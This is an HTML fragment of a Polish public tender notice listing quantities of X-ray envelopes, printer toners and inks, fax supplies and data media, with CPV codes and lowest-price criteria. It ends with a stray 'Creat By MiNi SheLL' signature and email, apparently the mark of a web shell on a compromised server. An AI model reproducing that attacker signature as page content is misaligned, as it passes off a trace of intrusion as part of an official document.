3.	Koperta RTG 26 x 32 biała	szt.	4000
4.	Koperta RTG 37 x 37 biała	szt.	2000
5.	Koperta RTG 42 x 32 biała	szt.	2000
6.	Koperta RTG 45 x 37 biała	szt.	1200
7.	Koperta RTG 16 x 23 biała	szt.	6000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.97.13-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET 4 - Materiały eksploatacyjne do drukarek komputerowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Taśma do drukarki igłowej Lexmark 2390 Plus	0011A3540 	szt.	15
2.	Taśma do drukarki igłowej OKI Microline 3320	9002303	szt.	5
3.	Taśma do drukarki igłowej STAR Micronics SP200-2	RC200B	szt.	5
5.	Toner do drukarki laserowej HP 1005 	C7115A 	szt.	5
6.	Toner do drukarki laserowej HP 1020	Q2612A 	szt.	80
7.	Toner do drukarki laserowej HP 1100	C4092A 	szt.	10
8.	Toner do drukarki laserowej HP 1200	C7115X 	szt.	30
9.	Toner do drukarki laserowej HP 1320	Q5949X 	szt.	15
10.	Toner do drukarki laserowej HP P2015	Q7553X 	szt.	10
11.	Toner do drukarki laserowej HP P1006	CB435A 	szt.	15
12.	Toner do drukarki laserowej HP P1102	CE285A	szt.	5
13.	Toner do drukarki laserowej HP P1505n	CB436A	szt.	15
14.	Toner do drukarki laserowej HP P2035	CE505A	szt.	10
15.	Toner do drukarki laserowej HP P2055	CE505X	szt.	10
16.	Toner do drukarki - urządzenia wielofunkcyjnego HP LaserJet M1120N MFP	CB436A	szt.	20
17.	Toner do drukarki laserowej kolorowej HP 2550 black	Q3960A 	szt.	2
18.	Toner do drukarki laserowej kolorowej HP 2550 cyan	Q3961A 	szt.	2
19.	Toner do drukarki laserowej kolorowej HP 2550 yellow	Q3962A 	szt.	2
20.	Toner do drukarki laserowej kolorowej HP 2550 magenta	Q3963A 	szt.	2
21.	Toner do drukarki laserowej Lexmark E232	24016SE 	szt.	1
22.	Toner do drukarki laserowej OKI B430D	43979202	szt.	3
23.	Toner do urządzenia wielofunkcyjnego BROTHER DCP-7030	TN-2120	szt.	6
24.	Pojemnik z tuszem do drukarki atramentowej Lexmark Z 730	18CX781E 	szt.	5
25.	Pojemnik z tuszem do urządzenia wielofunkcyjnego Lexmark X 4850		szt.	
	czarny    	18Y0144E 		15
	kolorowy   	18YX143E 		5
26.	Pojemnik z tuszem do drukarki atramentowej HP OfficeJet 6000		szt.	
	czarny - HP No. 920XL    	CD975AE		30
	żółty - HP No. 920XL	CD974AE		30
	błękitny - HP No. 920XL	CD972AE		30
	purpurowy - HP No. 920XL	CD973AE		30
27.	Pojemnik z tuszem do urządzenia wielofunkcyjnego HP DeskJet F2280		szt.	
	czarny    	C9351CE		15
	Kolorowy	C9352CE		15
28.	Pojemnik z tuszem do drukarki atramentowej HP DeskJet 710 C		szt.	
	czarny  42 ml	51645AE 		5
	kolorowy  30 ml	C1823DE 		5
29.	Pojemnik z tuszem do drukarki atramentowej HP DeskJet 950 C		szt.	
	czarny  42 ml	51645AE 		5
	kolorowy  19 ml	C6578DE		5
30.	Pojemnik z tuszem do drukarki atramentowej HP DeskJet 845 C		szt.	
	czarny 25 ml	C6615DE 		5
	kolorowy 15 ml	C6625AE 		5
31.	Pojemnik z tuszem do drukarki atramentowej HP DeskJet 920 C		szt.	
	czarny 25 ml	C6615DE 		5
	kolorowy 19 ml	C6578DE		5
32.	Pojemnik z tuszem do drukarki atramentowej HP DeskJet 3420		szt.	
	czarny 10 ml	C8727A		2
	kolorowy 8 ml	C8728AE		2
33.	Pojemnik z tuszem do drukarki atramentowej HP DeskJet 5440		szt.	
	czarny  5 ml 	C9362EE 		5
	kolorowy  5 ml	C9361EE 		6
34.	Pojemnik z tuszem do drukarki atramentowej HP DeskJet 5940		szt.	
	Czarny 21 ml  	C8767EE 		10
	kolorowy 14  ml  	C9363EE 		6
35.	Pojemnik z tuszem do drukarki atramentowej HP PhotoSmart 7760		szt.	
	czarny 19 ml	C6656A 		15
	kolorowy  17 ml	C6657A 		15
36.	Pojemnik z tuszem do drukarki atramentowej HP DeskJet 1280C		szt.	
	czarny 42 ml	51645AE 		5
	kolorowy  19 ml	C6578DE		5
37.	Pojemnik z tuszem do drukarki atramentowej Canon B.J.C.4400		szt.	
	czarny 	BCI21BK 		3
	kolorowy 	BCI21C 		1
38.	Pojemnik z tuszem do urządzenia wielofunkcyjnego                Brother DCP-135C		szt.	
	black	LC970BK 		15
	cyan	LC970C 		10
	yellow	LC970Y 		10
	magenta	LC970M 		10
39.	Pojemnik z tuszem do urządzenia wielofunkcyjnego                Brother DCP-145C		szt.	
	black	LC980BK 		90
	cyan	LC980C 		65
	yellow	LC980Y		65
	magenta	LC980M		65
40.	Taśma do maszyny do pisania TRIUMPH ADLER GABRIELE 9009 		szt.	2

Uwaga!
Dostarczone przez Wykonawców materiały eksploatacyjne muszą być kompatybilne z wyżej wymienionym sprzętem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.19.23.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET 5 - Materiały eksploatacyjne do faksu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	PANASONIC KX-FT 988    pap. 210*30	KX-A106	szt.	220
2.	PANASONIC KX-FT 936    pap. 210*30	KX-A106	szt.	60
3.	PANASONIC KX-FT25      pap. 210*30	KX-A106	szt.	50
4.	Folia do faksu SHARP UX-P410	UX9CR 	szt.	15
5.	Folia do faksu PANASONIC KX-FP 218 	KX-FA52E 	szt.	2
6.	Folia do faksu PANASONIC KX-FP 88 PD 	KX-FA55 	szt.	2
7.	Toner do faksu PANASONIC KX-FL 613 	KX-FA83 	szt.	2
8.	Toner do faksu Brother FAX-2920	TN-2000 	szt.	12

Uwaga!
Dostarczone przez Wykonawców materiały eksploatacyjne muszą być kompatybilne z wyżej wymienionym sprzętem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.23.40-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET 6 -Nośniki danych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Dyskietka 3.5 cala 1.44 MB w op. plastykowym 10szt.	op.	60
2.	CD-R 700 MB w opakowaniu plastykowym	szt.	20
3.	CD-R 700 MB bez opakowania, górna część w jasnym kolorze	szt.	12000
4.	Płyta TDK DVD+R 4,7 GB w opakowaniu plastikowym	szt.	50
5.	Płyta TDK DVD-R 4,7 GB w opakowaniu plastikowym	szt.	50
6.	Płyta DVD-R 4,7 GB bez opakowania	szt.	200
7.	Płyta DVD+R 4,7 GB bez opakowania	szt.	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.58.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com